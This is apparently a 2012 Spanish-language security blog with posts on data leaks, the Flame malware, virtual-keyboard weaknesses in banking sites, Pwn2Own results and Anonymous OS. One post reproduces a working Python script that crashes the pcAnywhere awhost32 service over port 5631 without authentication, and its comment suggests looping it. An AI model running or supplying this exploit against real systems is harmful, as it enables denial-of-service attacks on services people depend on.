miércoles, 20 de junio de 2012

Fugas de datos y Normativas


Las fugas de datos se producen cuando la propiedad intelectual o la información confidencial salen de la red y las empresas pierden el control de los datos.


Es cada vez más como las personas se desplazan transportando datos de las empresas o información personal  en dispositivos de almacenamiento portátiles (como memorias USB, teléfonos inteligentes y ordenadores portátiles), los riesgos de fugas de datos aumentan.
Las fugas de datos pueden afectar a las empresas o al usuario en diferente grado. Por ejemplo, a un empleado de camino al trabajo se le puede caer el teléfono inteligente en el agua. Si el teléfono contiene correspondencia de clientes y el aparato deja de funcionar, la empresa habrá perdido los datos. Por suerte, en este caso, la información no habrá caído en las manos equivocadas y el daño será reducido. Pero la situación puede ser mucho peor: si un portátil con los números de las tarjetas de crédito de cientos de clientes se queda olvidado en el colectivo, subte a el mismo auto particular  y un individuo con malas intenciones se hace con la información, la empresa o el usuario común será responsable involuntariamente del robo de todos esos datos personales.
Las fugas de datos no solo afectan a los dispositivos informáticos portátiles. A veces, los mensajes con información confidencial de las empresas como ejemplo, se envían a los destinatarios equivocados o los cibercriminales interceptan mensajes instantáneos. Cuando no existe un control exhaustivo del acceso, los recursos delicados de la red pueden estar al alcance de usuarios no autorizados. Las empresas pueden sufrir fugas de datos por diferentes motivos y, por desgracia, los efectos también son innumerables. Además, las fugas de datos pueden generar publicidad negativa, dañar la reputación de la empresa, provocar pérdidas de clientes y beneficios, reducir el valor bursátil e, incluso, traer como consecuencia multas o dolores de cabeza muy importantes.
Para proteger a los ciudadanos contra los robos de identidades, las instituciones reguladoras han creado leyes que obligan a proteger la información confidencial contra este tipo de fugas. Para cumplirlas, las empresas deben utilizar métodos de cifrado que impidan la lectura y el acceso a los datos. En el caso de producirse una fuga de datos, si la empresa no cuenta con los controles adecuados tendrá como se explico problemas a nivel social o económicos importantes.
MI parecer o meramente dar una imposición de implementar soluciones de seguridad que ofrezcan el control necesario para evitar fugas de datos y funciones de cifrado que los protejan en caso de pérdidas o ataques. Además, dicha solución debe permitir a la empresa o al usuario demostrar que cumplen ellos mismo las normativas para su protección.


domingo, 17 de junio de 2012

Virus Flame



El malware tiene un tamaño inusual grande de 20 MB, está escrito parcialmente en el lenguaje de programación interpretado Lua con código C++ compilado y permite que otros módulos atacantes sean cargados después de la infección inicial. El malware usa cinco métodos diferentes de cifrado y una base de datos SQLite para almacenar información. El método usado para inyectar el código en varios procesos es silencioso, de forma que los módulos malware no aparecen en la lista de los módulos cargados en un proceso y las páginas de memoria son protegidas con los permisos READ, WRITE y EXECUTE que la hacen inaccesible para las aplicaciones en modo usuario. El código interno tiene pocas similitudes con otros malware, pero aprovecha dos vulnerabilidades que también fueron usadas previamente por Stuxnet para infectar sistemas. El malware determina qué software antivirus está instalado en el sistema y modifica su comportamiento (por ejemplo, cambiando la extensión de archivo que utiliza) para reducir la probabilidad de ser detectado por ese software. Indicadores adicionales de que un sistema está infectado son la exclusión mutua (mutex) y la actividad del registro. 


Como recolecta información C&C de Flame, se una imagen completa de como recolecta dominios y servidores 





    sábado, 14 de abril de 2012

    Teclados Virtuales ¿Son Seguros?

    Como todos saben, algunas de las paginas mas visitadas en estos últimos tiempos son las de los bancos y sitios de e-commerce, pero lo que hay que destacar es que no se tiene en cuenta la importancia de la la proteccion de datos a la hará de efectuar una operación.
    Se deben considerar 3 ejemplos posibles:

  • Del lado del usuario, nos conectamos a un banco o a una web de compras, ¿sera verdad que se posee una  "pequeña tranquilidad" viendo el "candadito"?
  • Del lado del proveedor de ese servicio, ¿damos por aprobado que los usuarios estarán seguros, porque disponen del último antivirus, parche o cumplieron con la norma  ISO xxxxx ?
  • Del lado del atacante, están contentos porque instalaron el último keylogger antidetectable, y pueden saber si el usuario entra y sale de este  tipo de paginas realizando operaciones que para el mismo usuario es confiable.

  • La verdad todo esto lo puedo denominar cero seguridad.
















    De antemano, sabemos que es importante no acceder desde lugares públicos, (llámese ciber, aeropuerto, hoteles, etc) a cualquier sitio en el que se deba ingresar información sensible, dado que desde allí es más sencillo un ataque.

    No siempre la seguridad de teclados virtuales es la mejor, algunos llegan al punto de guardar en "campos ocultos" los datos digitados sin cifrar, para luego ser enviados en métodos GET o POST, otros guardan una cookie en texto plano con esta información, sin contar con los que guardan toda la información digitada en la cache del navegador.

    Existen métodos como la suplantación del teclado en la cache del navegador, que permiten a un atacante, sin modificar la p´sgina de la entidad bancaria o el sitio que contenga el teclado virtual, reemplazarlo con otro que además de enviar la información al sitio donde debería ir, también envía una copia de la misma a ellos y para esto solo es necesario que el usuario visite un sitio malicioso, para después acceder a la pagina legitima de la entidad.

    Los atacantes casi siempre están un paso adelante, keyloggers indetectables, troyanos que graban videos, y aplicaciones que utilizamos para manejo de proxys, las cuales son de utilidad en el traslado de los paquetes hacia el destino, no se habla de sniffing, sino que se habla de la traslación de esos paquetes, que  no están cifrados en el momento que los utilizamos en nuestro ordenador.

    La clave ingresada, sea ingresada por el teclado físico o por teclado virtual, en su mayoría no es cifrada (al menos de cada 10 bancos que probee, sólo 2 estaban cifrados), y pude capturar lo ingresado por teclado virtual, en ¡texto plano!, en otros bancos, capture el hash que realizo el teclado virtual, pero no hay como un buen traductor (Hash Online).














    sábado, 17 de marzo de 2012

    EXPLOIT QUE HACE FALLAR

    Es un codigo en Phyton que puede causar una denegación de servicios (DoS), en versiones de pcanhywere en windows, incluso parcheadas (versiones 12.5.0 build y 463 posteriores).

    Breve Script pcanywhere nuke hace fallar (crash) ashost32 sin necesidad de autenticar


    #!/usr/bin/python

    '''

    Exploit Title: PCAnywhere Nuke

    Date: 2/16/12
    Version: PCAnyWhere (12.5.0 build 463) and below

    Tested on: Windows

    Description: The following code will crash the awhost32 service. It'll be respawned

    so if you want to be a real pain you'll need to loop this.. my inital impressions

    are that controlling execuction will be a pain.

    '''

    import sys

    import socket

    import argparse

    if len(sys.argv) != 2:

    print "[+] Usage: ./pcNuke.py "

    sys.exit(1)

    HOST = sys.argv[1]

    PORT = 5631

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

    s.connect((HOST, PORT))

    # HELLO!

    s.send("\x00\x00\x00\x00")

    buf = s.recv(1024)

    # ACK!

    s.send("\x6f\x06\xfe")

    buf = s.recv(1024)

    # Auth capability part 1

    s.send("\x6f\x62\xff\x09\x00\x07\x00\x00\x01\xff\x00\x00\x07\x00")

    # Auth capability part 2

    s.send("\x6f\x62\xff\x09\x00\x07\x00\x00\x01\xff\x00\x00\x07\x00")

    Se le suma también recientes filtraciones de código fuente con intento de extorsión incluido, podemos observar que no corren buenos tiempos para Symantec..


    Chrome, IE y Firefox vulnerados en Pwn2Own


    http://blog.segu-info.com.ar/2012/03/chrome-cae-los-primeros-5-minutos-en.html

    http://blog.segu-info.com.ar/2012/03/ie-9-segundo-en-caer-con-dos-0days.html

    https://www.zdnet.com/blog/security/researchers-hack-into-newest-firefox-with-zero-day-flaw/10663

    El exploit se aprovecha de una vulnerabilidad del navegador y es capaz de sortear con exito las protecciones DEP y ASRL, que son dos herramientas de windows, para ofrecer mayor protección contra exploits.
    Se pudo ejecutar la misma vulnerabilidad en 3 ocaciones, en la primera se pudo filtra información, en la segunda direcciones de datos y en la tercera ejecución de codigos
    SourceForge, removió definitivamente de sus registros al sistema operativo basado en Linux que supuestamente había sido desarrollado por el grupo hacktivista Anonymous. SourceForge sostuvo que al parecer no tenía ninguna conexión con la agrupación y que su nombre llama alevosamente a la confusión, además de carecer de transparencia en términos de seguridad. Tras su lanzamiento habían surgido voces cuestionando su seguridad. “Por ello decidimos retirar esta descarga y suspender este proyecto hasta que poseamos más información que nos pudiera llevar a pensar distinto”, expuso el equipo del sitio en su blog. Una polémica bien álgida se formó en torno a la posibilidad de que el software desarrollado en Ubuntu Linux pudiera contener malware. Al respecto, Graham Cluley, consultor de Sophos, señaló en el blog de Naked Security que a pesar de que la compañía aún no había analizado el código, “no sería una sorpresa si es que un troyano se hubiera filtrado dentro del Anonymous OS”.

    Busquedas